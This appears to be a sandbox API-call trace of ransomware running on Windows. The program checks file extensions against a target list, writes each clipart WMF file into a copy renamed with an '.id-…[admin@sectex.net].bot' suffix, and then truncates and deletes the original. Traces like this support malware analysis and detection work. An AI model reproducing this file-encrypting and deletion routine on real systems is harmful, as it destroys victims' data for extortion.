	[0144.135] lstrlenW (lpString=".docx") returned 5
	[0144.135] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.135] lstrlenW (lpString=".pdf") returned 4
	[0144.135] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.135] lstrlenW (lpString=".xls") returned 4
	[0144.135] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.135] lstrlenW (lpString=".xlsx") returned 5
	[0144.135] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.135] lstrlenW (lpString=".ppt") returned 4
	[0144.135] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.135] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63
	[0144.135] lstrlenW (lpString=".zip") returned 4
	[0144.135] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.135] lstrlenW (lpString=".rar") returned 4
	[0144.135] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.135] lstrlenW (lpString=".bz2") returned 4
	[0144.135] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.135] lstrlenW (lpString=".7z") returned 3
	[0144.135] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.135] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63
	[0144.135] lstrlenW (lpString=".dbf") returned 4
	[0144.135] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.136] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63
	[0144.136] lstrlenW (lpString=".1cd") returned 4
	[0144.136] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.136] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63
	[0144.136] lstrlenW (lpString=".jpg") returned 4
	[0144.136] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.136] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63
	[0144.136] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63
	[0144.136] lstrlenW (lpString=".doc") returned 4
	[0144.136] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.136] lstrlenW (lpString=".docx") returned 5
	[0144.136] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.136] lstrlenW (lpString=".pdf") returned 4
	[0144.136] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.136] lstrlenW (lpString=".xls") returned 4
	[0144.136] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.136] lstrlenW (lpString=".xlsx") returned 5
	[0144.136] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.136] lstrlenW (lpString=".ppt") returned 4
	[0144.136] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.136] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63
	[0144.136] lstrlenW (lpString=".zip") returned 4
	[0144.136] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.136] lstrlenW (lpString=".rar") returned 4
	[0144.136] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.136] lstrlenW (lpString=".bz2") returned 4
	[0144.136] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.136] lstrlenW (lpString=".7z") returned 3
	[0144.136] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.137] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63
	[0144.137] lstrlenW (lpString=".dbf") returned 4
	[0144.137] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.137] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63
	[0144.137] lstrlenW (lpString=".1cd") returned 4
	[0144.137] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.137] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63
	[0144.137] lstrlenW (lpString=".jpg") returned 4
	[0144.137] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.137] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0144.137] lstrlenW (lpString="DD00437_.WMF") returned 12
	[0144.137] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00437_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0144.137] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=1932) returned 1
	[0144.137] CloseHandle (hObject=0x39c) returned 1
	[0144.138] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00437_.wmf")) returned 0x20
	[0144.138] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00437_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.138] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00437_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0144.138] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.138] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.138] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00437_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0144.139] GetLastError () returned 0x0
	[0144.139] ReadFile (in: hFile=0x39c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x78c, lpOverlapped=0x0) returned 1
	[0144.140] WriteFile (in: hFile=0x25c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x790, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x790, lpOverlapped=0x0) returned 1
	[0144.141] ReadFile (in: hFile=0x39c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.141] WriteFile (in: hFile=0x25c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.141] SetEndOfFile (hFile=0x25c) returned 1
	[0144.141] CloseHandle (hObject=0x25c) returned 1
	[0144.141] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.141] SetEndOfFile (hFile=0x39c) returned 1
	[0144.143] CloseHandle (hObject=0x39c) returned 1
	[0144.143] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.144] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00437_.wmf")) returned 1
	[0144.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63
	[0144.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63
	[0144.144] lstrlenW (lpString=".doc") returned 4
	[0144.144] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.144] lstrlenW (lpString=".docx") returned 5
	[0144.144] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.144] lstrlenW (lpString=".pdf") returned 4
	[0144.144] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.144] lstrlenW (lpString=".xls") returned 4
	[0144.144] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.144] lstrlenW (lpString=".xlsx") returned 5
	[0144.144] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.144] lstrlenW (lpString=".ppt") returned 4
	[0144.144] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63
	[0144.145] lstrlenW (lpString=".zip") returned 4
	[0144.145] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.145] lstrlenW (lpString=".rar") returned 4
	[0144.145] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.145] lstrlenW (lpString=".bz2") returned 4
	[0144.145] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.145] lstrlenW (lpString=".7z") returned 3
	[0144.145] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63
	[0144.145] lstrlenW (lpString=".dbf") returned 4
	[0144.145] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63
	[0144.145] lstrlenW (lpString=".1cd") returned 4
	[0144.145] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63
	[0144.145] lstrlenW (lpString=".jpg") returned 4
	[0144.145] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63
	[0144.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63
	[0144.145] lstrlenW (lpString=".doc") returned 4
	[0144.145] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.145] lstrlenW (lpString=".docx") returned 5
	[0144.145] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.145] lstrlenW (lpString=".pdf") returned 4
	[0144.145] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.145] lstrlenW (lpString=".xls") returned 4
	[0144.145] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.145] lstrlenW (lpString=".xlsx") returned 5
	[0144.145] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.145] lstrlenW (lpString=".ppt") returned 4
	[0144.145] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63
	[0144.146] lstrlenW (lpString=".zip") returned 4
	[0144.146] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.146] lstrlenW (lpString=".rar") returned 4
	[0144.146] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.146] lstrlenW (lpString=".bz2") returned 4
	[0144.146] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.146] lstrlenW (lpString=".7z") returned 3
	[0144.146] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63
	[0144.146] lstrlenW (lpString=".dbf") returned 4
	[0144.146] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63
	[0144.146] lstrlenW (lpString=".1cd") returned 4
	[0144.146] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63
	[0144.146] lstrlenW (lpString=".jpg") returned 4
	[0144.146] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.146] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0144.146] lstrlenW (lpString="DD00448_.WMF") returned 12
	[0144.146] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00448_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0144.147] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=2952) returned 1
	[0144.147] CloseHandle (hObject=0x39c) returned 1
	[0144.147] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00448_.wmf")) returned 0x20
	[0144.147] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00448_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.148] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00448_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0144.148] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.148] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.148] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00448_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0144.148] GetLastError () returned 0x0
	[0144.148] ReadFile (in: hFile=0x39c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0xb88, lpOverlapped=0x0) returned 1
	[0144.150] WriteFile (in: hFile=0x25c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xb90, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xb90, lpOverlapped=0x0) returned 1
	[0144.151] ReadFile (in: hFile=0x39c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.151] WriteFile (in: hFile=0x25c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.151] SetEndOfFile (hFile=0x25c) returned 1
	[0144.151] CloseHandle (hObject=0x25c) returned 1
	[0144.152] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.152] SetEndOfFile (hFile=0x39c) returned 1
	[0144.153] CloseHandle (hObject=0x39c) returned 1
	[0144.157] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.158] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00448_.wmf")) returned 1
	[0144.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63
	[0144.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63
	[0144.158] lstrlenW (lpString=".doc") returned 4
	[0144.158] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.158] lstrlenW (lpString=".docx") returned 5
	[0144.158] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.158] lstrlenW (lpString=".pdf") returned 4
	[0144.158] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.158] lstrlenW (lpString=".xls") returned 4
	[0144.158] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.158] lstrlenW (lpString=".xlsx") returned 5
	[0144.158] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.158] lstrlenW (lpString=".ppt") returned 4
	[0144.158] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63
	[0144.158] lstrlenW (lpString=".zip") returned 4
	[0144.158] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.158] lstrlenW (lpString=".rar") returned 4
	[0144.159] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.159] lstrlenW (lpString=".bz2") returned 4
	[0144.159] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.159] lstrlenW (lpString=".7z") returned 3
	[0144.159] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63
	[0144.159] lstrlenW (lpString=".dbf") returned 4
	[0144.159] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63
	[0144.159] lstrlenW (lpString=".1cd") returned 4
	[0144.159] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63
	[0144.159] lstrlenW (lpString=".jpg") returned 4
	[0144.159] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63
	[0144.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63
	[0144.159] lstrlenW (lpString=".doc") returned 4
	[0144.159] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.159] lstrlenW (lpString=".docx") returned 5
	[0144.159] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.159] lstrlenW (lpString=".pdf") returned 4
	[0144.159] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.159] lstrlenW (lpString=".xls") returned 4
	[0144.159] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.159] lstrlenW (lpString=".xlsx") returned 5
	[0144.159] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.159] lstrlenW (lpString=".ppt") returned 4
	[0144.159] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63
	[0144.159] lstrlenW (lpString=".zip") returned 4
	[0144.159] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.159] lstrlenW (lpString=".rar") returned 4
	[0144.159] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.160] lstrlenW (lpString=".bz2") returned 4
	[0144.160] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.160] lstrlenW (lpString=".7z") returned 3
	[0144.160] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63
	[0144.160] lstrlenW (lpString=".dbf") returned 4
	[0144.160] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63
	[0144.160] lstrlenW (lpString=".1cd") returned 4
	[0144.160] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63
	[0144.160] lstrlenW (lpString=".jpg") returned 4
	[0144.160] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.160] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0144.160] lstrlenW (lpString="DD00449_.WMF") returned 12
	[0144.160] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00449_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0144.160] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=9992) returned 1
	[0144.161] CloseHandle (hObject=0x39c) returned 1
	[0144.161] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00449_.wmf")) returned 0x20
	[0144.161] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00449_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.161] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00449_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0144.161] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.161] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.161] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00449_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0144.162] GetLastError () returned 0x0
	[0144.162] ReadFile (in: hFile=0x39c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x2708, lpOverlapped=0x0) returned 1
	[0144.317] WriteFile (in: hFile=0x25c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x2710, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x2710, lpOverlapped=0x0) returned 1
	[0144.318] ReadFile (in: hFile=0x39c, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.318] WriteFile (in: hFile=0x25c, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.318] SetEndOfFile (hFile=0x25c) returned 1
	[0144.318] CloseHandle (hObject=0x25c) returned 1
	[0144.318] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.318] SetEndOfFile (hFile=0x39c) returned 1
	[0144.320] CloseHandle (hObject=0x39c) returned 1
	[0144.320] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.337] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00449_.wmf")) returned 1
	[0144.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63
	[0144.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 63
	[0144.338] lstrlenW (lpString=".doc") returned 4
	[0144.338] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.338] lstrlenW (lpString=".docx") returned 5
	[0144.338] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.338] lstrlenW (lpString=".pdf") returned 4
	[0144.338] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.338] lstrlenW (lpString=".xls") returned 4
	[0144.338] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
